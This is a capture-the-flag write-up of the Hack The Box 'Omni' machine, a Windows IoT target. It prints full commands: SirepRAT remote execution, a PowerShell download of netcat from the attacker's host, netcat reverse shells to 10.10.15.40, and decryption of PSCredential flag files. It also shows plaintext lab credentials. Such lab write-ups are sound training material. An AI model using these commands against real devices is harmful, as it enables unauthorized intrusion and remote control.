Omni is a Easy machine from HTB. The info card features a question mark in place of the OS. It’s something a little bit different than normal. I would sharpen your PowerShell skill though.
Enumeration
We start off with an NMAP scan and see a whole bunch of open port on what seems to be a Windows machine.
Nmap scan report for 10.10.10.204
Host is up (0.081s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/26%Time=5F46539B%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
We start looking at the ports. RPC looks interesting and we try to get a connection going with rpcclient but we are unsuccessful. Then, we google around trying to find something for ARCserve. No luck again. We check out port 8080 and are greeted by a login prompt.
Unfortunately, we have no credentials. At this point, we turn back to google. We search for “Windows Device Manager” and find some references to Windows IoT. A lightweight version of Windows 10 intended to be used in embedded devices. We now know more about what we are looking at.
Foothold
We do some more googling here and quickly find a rather interesting GitHub repository.
https://github.com/SafeBreach-Labs/SirepRAT
It includes an awesome white paper and a set of slides.
I won’t go into all the details. However, the basic idea is that if you are connected to the to Windows IoT systems via Ethernet can run commands as system. This is possibly due to Windows IoT having some relation to a windows mobile OS and it’s debugging shell that would have been connected to over USB.
Now we aren’t actually connected via Ethernet but from the prospective of Omni we might as well be.
We clone the repository and start getting it set up. This is a bit tricky because it was written in python2 and is also dependency heck.
Eventually, we get the required libraries installed, including enum34, and are able to get setup. We start an HTPP python server in the a directory with a windows netcat binary, sudo python -m http.server 80, and a netcat listener with rlwrap to catch out reverse shell, rlwrap nc -lnvp 4436.
We use SirepRAT to launch a command, providing the the path to PowerShell and use Invoke-WebRequest to retrieve netcat from our python server and save it. We then launch cmd.exe and run our netcat file and pass it the arguments to open a reverse shell with PowerShell to our machine.
python2 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-WebRequest -OutFile C:\Windows\System32\nc78.exe -URI http://10.10.15.40/nc64.exe" --vv && python2 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\windows\system32\cmd.exe" --args "/c C:\windows\system32\nc78.exe 10.10.15.40 4436 -e C:\windows\system32\WindowsPowershell\v1.0\powershell.exe" --vv
And we have a shell at last.
Enumeration on the box
Now that we are on the box, it is time to find out flags and figure out how to get them. There is no C:\Users So we run a quick search with PowerShell to find any .txt files.
PS C:\Users\Public> Get-Childitem -Path C:\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue
...
Directory: C:\Data\Users\administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/4/2020 9:48 PM 1958 root.txt
...
Directory: C:\Data\Users\app
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/4/2020 8:20 PM 344 hardening.txt
-ar--- 7/4/2020 9:53 PM 1958 user.txt
We find user.txt and root.txt in C:\Data\Users\app and C:\Data\Users\administrator respectively.
Running $env:username shows us that we are the user omni so not the same as app but we decide to head over and see if we can snag the flag. Typing it out, we found a slight issue.
We check through app data, the path variable, and iot-admin.xml but we can’t seem to find anything to leverage. I went a bit crazy at this point after checking the forums because there were multiple references to checking the “path”. However, I was unable to find anything unusual there.
I honestly got stuck here for quite a while. Eventually, I got a nudge to check for hidden batch files which we did with the following command.
PS C:\> Get-ChildItem -Recurse -Filter *.bat -Force
Most of the results from this are things we don’t have access to. But there are a few we do. One looks rather suspicious. C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat
Side note: From my conversations with a few others, their shells started in C:\Program Files\WindowsPowerShell\Modules\PackageManagement which probably explains the path reference. I’m not sure why mine wasn’t there..
We type that file and are created by a beautiful sight, credentials.
PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
type r.bat
@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT
User
We are ready to go for User at last. We head back to port 8080 and login as the user app.
Under the processes tab, there is an option to “Run Command” that catches our eye right away. We select that and sure enough we have a forum to fill in to run commands. We kill our current revers shell, restart our listener and then enter the following command.
C:\windows\system32\nc79.exe 10.10.15.40 4436 -e C:\windows\system32\WindowsPowershell\v1.0\powershell.exe
A moment later, we get notice that the command has failed… But if we go back over to our listener we can see that we do in fact have a shell.
It seems the reports of failure were greatly exaggerated.
We head back to the apps home direction, C:\Data\Users\app and get to work on the file. Despite the ending extension of .txt, you might have noticed user.txt looks more like an xml file.
The PowerShell cmdlet that imports an xml file and creates a powershell object. Import-CliXML We run that providing user.txt as a path and it tells us, System.Security.SecureString After some research, we learn it is a saved credential object and can be used to return a password.
$user123 = Import-CliXML -Path .\user.txt
$user123.GetNerworkCredentials().Password
Submit our flag and we got user!
Root
Root is nearly identical, as you might have guessed. We follow the same steps to login and get a reverse shell running and then retrieve the administrator passwordfrom root.txt
PS C:\Data\Users\administrator> $root123 = Import-CliXML -Path .\root.txt
$root123 = Import-CliXML -Path .\root.txt
PS C:\Data\Users\administrator> $root123.GetNetworkCredential().Password
$root123.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\Data\Users\administrator>
Wrap Up
Some people felt that what was after that was a bit CTF ish and I’m definitely confused how we were supposed to figure out r.bat when we don’t necessarily land in that directory. I really enjoyed this box however, and it was a excellent opportunity to learn some new PowerShell tricks. Thank you egre55 for creating it!